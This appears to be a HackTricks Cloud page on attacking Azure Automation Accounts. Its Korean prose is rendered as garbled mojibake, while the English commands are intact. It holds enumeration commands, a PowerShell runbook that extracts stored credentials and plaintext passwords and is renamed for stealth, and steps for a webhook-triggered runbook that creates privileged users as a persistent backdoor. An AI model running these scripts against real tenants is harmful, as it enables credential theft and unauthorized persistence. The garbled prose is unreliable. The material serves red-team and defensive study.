Korean - Ht Cloud
HackTricks TrainingTwitterLinkedinSponsor

Az - Automation Account

Support HackTricks

Basic Information

From the docs: Azure Automation์€ Azure ๋ฐ ๋น„ Azure ํ™˜๊ฒฝ ์ „๋ฐ˜์— ๊ฑธ์ณ ์ผ๊ด€๋œ ๊ด€๋ฆฌ๋ฅผ ์ง€์›ํ•˜๋Š” ํด๋ผ์šฐ๋“œ ๊ธฐ๋ฐ˜ ์ž๋™ํ™”, ์šด์˜ ์ฒด์ œ ์—…๋ฐ์ดํŠธ ๋ฐ ๊ตฌ์„ฑ ์„œ๋น„์Šค์ž…๋‹ˆ๋‹ค. ์—ฌ๊ธฐ์—๋Š” ํ”„๋กœ์„ธ์Šค ์ž๋™ํ™”, ๊ตฌ์„ฑ ๊ด€๋ฆฌ, ์—…๋ฐ์ดํŠธ ๊ด€๋ฆฌ, ๊ณต์œ  ๊ธฐ๋Šฅ ๋ฐ ์ด์งˆ์ ์ธ ๊ธฐ๋Šฅ์ด ํฌํ•จ๋ฉ๋‹ˆ๋‹ค.

์ด๊ฒƒ๋“ค์€ Azure์—์„œ "์˜ˆ์•ฝ๋œ ์ž‘์—…"๊ณผ ๊ฐ™์œผ๋ฉฐ, Azure ํ™˜๊ฒฝ์„ ๊ด€๋ฆฌ, ํ™•์ธ ๋ฐ ๊ตฌ์„ฑํ•˜๊ธฐ ์œ„ํ•ด ์ž‘์—…(์ž‘์—… ๋˜๋Š” ์Šคํฌ๋ฆฝํŠธ)์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ค๋‹ˆ๋‹ค.

Run As Account

Run as Account๊ฐ€ ์‚ฌ์šฉ๋˜๋ฉด, Azure AD ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์ด ์ž์ฒด ์„œ๋ช…๋œ ์ธ์ฆ์„œ๋กœ ์ƒ์„ฑ๋˜๊ณ , ์„œ๋น„์Šค ์ฃผ์ฒด๊ฐ€ ์ƒ์„ฑ๋˜๋ฉฐ, ํ˜„์žฌ ๊ตฌ๋…์—์„œ ๊ณ„์ •์— ๊ธฐ์—ฌ์ž ์—ญํ• ์ด ํ• ๋‹น๋ฉ๋‹ˆ๋‹ค(๋งŽ์€ ๊ถŒํ•œ). Microsoft๋Š” Automation Account์— ๊ด€๋ฆฌํ˜• ID๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ์„ ๊ถŒ์žฅํ•ฉ๋‹ˆ๋‹ค.

์ด๊ฒƒ์€ 2023๋…„ 9์›” 30์ผ์— ์ œ๊ฑฐ๋˜๊ณ  ๊ด€๋ฆฌํ˜• ID๋กœ ๋ณ€๊ฒฝ๋ฉ๋‹ˆ๋‹ค.

Runbooks & Jobs

Runbooks๋Š” ์ž„์˜์˜ PowerShell ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ค๋‹ˆ๋‹ค. ์ด๋Š” ๊ณต๊ฒฉ์ž์— ์˜ํ•ด ์•…์šฉ๋  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ฒจ๋ถ€๋œ ์ฃผ์ฒด์˜ ๊ถŒํ•œ์„ ํ›”์น  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค(์žˆ๋Š” ๊ฒฝ์šฐ). Runbooks์˜ ์ฝ”๋“œ์—์„œ ๋ฏผ๊ฐํ•œ ์ •๋ณด(์˜ˆ: ์ž๊ฒฉ ์ฆ๋ช…)๋ฅผ ์ฐพ์„ ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค.

์ž‘์—…์„ ์ฝ์„ ์ˆ˜ ์žˆ๋‹ค๋ฉด, ์‹คํ–‰์˜ ์ถœ๋ ฅ(์ž ์žฌ์ ์ธ ๋ฏผ๊ฐํ•œ ์ •๋ณด)์„ ํฌํ•จํ•˜๊ณ  ์žˆ์œผ๋ฏ€๋กœ ์ฝ์–ด๋ณด์„ธ์š”.

Automation Accounts --> <Select Automation Account> --> Runbooks/Jobs/Hybrid worker groups/Watcher tasks/credentials/variables/certificates/connections๋กœ ์ด๋™ํ•˜์„ธ์š”.

Hybrid Worker

Runbook์€ Azure ๋‚ด์˜ ์ปจํ…Œ์ด๋„ˆ ๋˜๋Š” ํ•˜์ด๋ธŒ๋ฆฌ๋“œ ์›Œ์ปค(๋น„ Azure ๋จธ์‹ )์—์„œ ์‹คํ–‰๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. Log Analytics Agent๋Š” VM์— ๋ฐฐํฌ๋˜์–ด ํ•˜์ด๋ธŒ๋ฆฌ๋“œ ์›Œ์ปค๋กœ ๋“ฑ๋ก๋ฉ๋‹ˆ๋‹ค. ํ•˜์ด๋ธŒ๋ฆฌ๋“œ ์›Œ์ปค ์ž‘์—…์€ Windows์—์„œ SYSTEM์œผ๋กœ, Linux์—์„œ nxautomation ๊ณ„์ •์œผ๋กœ ์‹คํ–‰๋ฉ๋‹ˆ๋‹ค. ๊ฐ ํ•˜์ด๋ธŒ๋ฆฌ๋“œ ์›Œ์ปค๋Š” ํ•˜์ด๋ธŒ๋ฆฌ๋“œ ์›Œ์ปค ๊ทธ๋ฃน์— ๋“ฑ๋ก๋ฉ๋‹ˆ๋‹ค.

๋”ฐ๋ผ์„œ Windows Hybrid Worker์—์„œ Runbook์„ ์‹คํ–‰ํ•˜๋„๋ก ์„ ํƒํ•  ์ˆ˜ ์žˆ๋‹ค๋ฉด, System์œผ๋กœ ์™ธ๋ถ€ ๋จธ์‹  ๋‚ด์—์„œ ์ž„์˜์˜ ๋ช…๋ น์„ ์‹คํ–‰ํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค(์ข‹์€ ํ”ผ๋ฒ— ๊ธฐ์ˆ ).

Compromise State Configuration (SC)

From the docs: Azure Automation State Configuration์€ ํด๋ผ์šฐ๋“œ ๋˜๋Š” ์˜จํ”„๋ ˆ๋ฏธ์Šค ๋ฐ์ดํ„ฐ ์„ผํ„ฐ์˜ ๋…ธ๋“œ์— ๋Œ€ํ•œ PowerShell Desired State Configuration (DSC) ๊ตฌ์„ฑ์„ ์ž‘์„ฑ, ๊ด€๋ฆฌ ๋ฐ ์ปดํŒŒ์ผํ•  ์ˆ˜ ์žˆ๋Š” Azure ๊ตฌ์„ฑ ๊ด€๋ฆฌ ์„œ๋น„์Šค์ž…๋‹ˆ๋‹ค. ์ด ์„œ๋น„์Šค๋Š” DSC ๋ฆฌ์†Œ์Šค๋ฅผ ๊ฐ€์ ธ์˜ค๊ณ , ๊ตฌ์„ฑ์„ ๋Œ€์ƒ ๋…ธ๋“œ์— ํ• ๋‹นํ•˜๋ฉฐ, ๋ชจ๋‘ ํด๋ผ์šฐ๋“œ์—์„œ ์ˆ˜ํ–‰๋ฉ๋‹ˆ๋‹ค. Azure ํฌํ„ธ์—์„œ ๊ตฌ์„ฑ ๊ด€๋ฆฌ ์•„๋ž˜์˜ **์ƒํƒœ ๊ตฌ์„ฑ(DSC)**๋ฅผ ์„ ํƒํ•˜์—ฌ Azure Automation State Configuration์— ์•ก์„ธ์Šคํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ด๋Ÿฌํ•œ ๊ตฌ์„ฑ์—์„œ ๋ฏผ๊ฐํ•œ ์ •๋ณด๋ฅผ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

RCE

SC๋ฅผ ์•…์šฉํ•˜์—ฌ ๊ด€๋ฆฌ๋˜๋Š” ๋จธ์‹ ์—์„œ ์ž„์˜์˜ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Az - State Configuration RCE

Enumeration

# Check user right for automation
az extension add --upgrade -n automation
az automation account list # if it doesn't return anything the user is not a part of an Automation group

# Gets Azure Automation accounts in a resource group
Get-AzAutomationAccount

# List & get DSC configs
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -match '<name>'} | Export-AzAutomationDscConfiguration -OutputFolder . -Debug
## Automation Accounts named SecurityBaselineConfigurationWS... are there by default (not interesting)

# List & get Run books code
Get-AzAutomationAccount | Get-AzAutomationRunbook
Get-AzAutomationAccount | Get-AzAutomationRunbook | Export-AzAutomationRunbook -OutputFolder /tmp

# List credentials & variables & others
Get-AzAutomationAccount | Get-AzAutomationCredential
Get-AzAutomationAccount | Get-AzAutomationVariable
Get-AzAutomationAccount | Get-AzAutomationConnection
Get-AzAutomationAccount | Get-AzAutomationCertificate
Get-AzAutomationAccount | Get-AzAutomationSchedule
Get-AzAutomationAccount | Get-AzAutomationModule
Get-AzAutomationAccount | Get-AzAutomationPython3Package
## Exfiltrate credentials & variables and the other info loading them in a Runbook and printing them

# List hybrid workers
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>

์ž๋™ํ™” ๊ณ„์ •์—์„œ Run Book์„ ์‚ฌ์šฉํ•˜์—ฌ ์ •์˜๋œ ์ž๊ฒฉ ์ฆ๋ช… ๋ฐ ๋ณ€์ˆ˜๋ฅผ ์™ธ๋ถ€๋กœ ์œ ์ถœํ•˜๊ธฐ

# Change the crdentials & variables names and add as many as you need
@'
$creds = Get-AutomationPSCredential -Name <credentials_name>
$runbook_variable = Get-AutomationVariable -name <variable_name>
$runbook_variable
$creds.GetNetworkCredential().username
$creds.GetNetworkCredential().password
'@ | out-file -encoding ascii 'runbook_get_creds.ps1'

$ResourceGroupName = '<resource_group_name>'
$AutomationAccountName = '<auto_acc_name>'
$RunBookName = 'Exif-Credentials' #Change this for stealthness

# Creare Run book, publish, start, and get output
New-AzAutomationRunBook -name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Type PowerShell
Import-AzAutomationRunBook -Path 'runbook_get_creds.ps1' -Name $RunBookName -Type PowerShell -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Force
Publish-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
$start = Start-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
start-sleep 20
($start | Get-AzAutomationJob | Get-AzAutomationJobOutput).Summarynt

๊ธฐ์กด Run Book์„ ์ˆ˜์ •ํ•˜์—ฌ ์›น ์ฝ˜์†”์—์„œ ๋™์ผํ•œ ์ž‘์—…์„ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ž๋™ํ™”๋œ ๊ณ ๊ธ‰ ๊ถŒํ•œ ์‚ฌ์šฉ์ž ์ƒ์„ฑ ์„ค์ • ๋‹จ๊ณ„

1. ์ž๋™ํ™” ๊ณ„์ • ์ดˆ๊ธฐํ™”

  • ํ•„์š”ํ•œ ์ž‘์—…: ์ƒˆ ์ž๋™ํ™” ๊ณ„์ •์„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.

  • ํŠน์ • ์„ค์ •: "Azure Run As ๊ณ„์ • ์ƒ์„ฑ"์ด ํ™œ์„ฑํ™”๋˜์–ด ์žˆ๋Š”์ง€ ํ™•์ธํ•ฉ๋‹ˆ๋‹ค.

2. Runbook ๊ฐ€์ ธ์˜ค๊ธฐ ๋ฐ ์„ค์ •

  • ์ถœ์ฒ˜: MicroBurst GitHub Repository์—์„œ ์ƒ˜ํ”Œ runbook์„ ๋‹ค์šด๋กœ๋“œํ•ฉ๋‹ˆ๋‹ค.

  • ํ•„์š”ํ•œ ์ž‘์—…:

  • Runbook์„ ์ž๋™ํ™” ๊ณ„์ •์— ๊ฐ€์ ธ์˜ต๋‹ˆ๋‹ค.

  • Runbook์„ ๊ฒŒ์‹œํ•˜์—ฌ ์‹คํ–‰ ๊ฐ€๋Šฅํ•˜๊ฒŒ ๋งŒ๋“ญ๋‹ˆ๋‹ค.

  • ์™ธ๋ถ€ ํŠธ๋ฆฌ๊ฑฐ๋ฅผ ํ™œ์„ฑํ™”ํ•˜๊ธฐ ์œ„ํ•ด Runbook์— ์›นํ›„ํฌ๋ฅผ ์—ฐ๊ฒฐํ•ฉ๋‹ˆ๋‹ค.

3. AzureAD ๋ชจ๋“ˆ ๊ตฌ์„ฑ

  • ํ•„์š”ํ•œ ์ž‘์—…: AzureAD ๋ชจ๋“ˆ์„ ์ž๋™ํ™” ๊ณ„์ •์— ์ถ”๊ฐ€ํ•ฉ๋‹ˆ๋‹ค.

  • ์ถ”๊ฐ€ ๋‹จ๊ณ„: ๋ชจ๋“  Azure Automation ๋ชจ๋“ˆ์ด ์ตœ์‹  ๋ฒ„์ „์œผ๋กœ ์—…๋ฐ์ดํŠธ๋˜์–ด ์žˆ๋Š”์ง€ ํ™•์ธํ•ฉ๋‹ˆ๋‹ค.

4. ๊ถŒํ•œ ํ• ๋‹น

  • ํ• ๋‹นํ•  ์—ญํ• :

  • ์‚ฌ์šฉ์ž ๊ด€๋ฆฌ์ž

  • ๊ตฌ๋… ์†Œ์œ ์ž

  • ๋Œ€์ƒ: ํ•„์š”ํ•œ ๊ถŒํ•œ์„ ์œ„ํ•ด ์ด๋Ÿฌํ•œ ์—ญํ• ์„ ์ž๋™ํ™” ๊ณ„์ •์— ํ• ๋‹นํ•ฉ๋‹ˆ๋‹ค.

5. ์ž ์žฌ์  ์ ‘๊ทผ ์†์‹ค ์ธ์‹

  • ์ฐธ๊ณ : ์ด๋Ÿฌํ•œ ์ž๋™ํ™”๋ฅผ ๊ตฌ์„ฑํ•˜๋ฉด ๊ตฌ๋…์— ๋Œ€ํ•œ ์ œ์–ด๋ฅผ ์žƒ์„ ์ˆ˜ ์žˆ์Œ์„ ์ธ์‹ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

6. ์‚ฌ์šฉ์ž ์ƒ์„ฑ ํŠธ๋ฆฌ๊ฑฐ

  • POST ์š”์ฒญ์„ ๋ณด๋‚ด ์›นํ›„ํฌ๋ฅผ ํŠธ๋ฆฌ๊ฑฐํ•˜์—ฌ ์ƒˆ ์‚ฌ์šฉ์ž๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.

  • ์ œ๊ณต๋œ PowerShell ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์‚ฌ์šฉํ•˜๊ณ , $uri๋ฅผ ์‹ค์ œ ์›นํ›„ํฌ URL๋กœ ๊ต์ฒดํ•˜๊ณ , $AccountInfo๋ฅผ ์›ํ•˜๋Š” ์‚ฌ์šฉ์ž ์ด๋ฆ„๊ณผ ๋น„๋ฐ€๋ฒˆํ˜ธ๋กœ ์—…๋ฐ์ดํŠธํ•ฉ๋‹ˆ๋‹ค.

$uri = "<YOUR_WEBHOOK_URL>"
$AccountInfo  = @(@{RequestBody=@{Username="<DESIRED_USERNAME>";Password="<DESIRED_PASSWORD>"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body

References

HackTricks ์ง€์›ํ•˜๊ธฐ
PreviousAz - ARM Templates / DeploymentsNextAz - State Configuration RCE

Last updated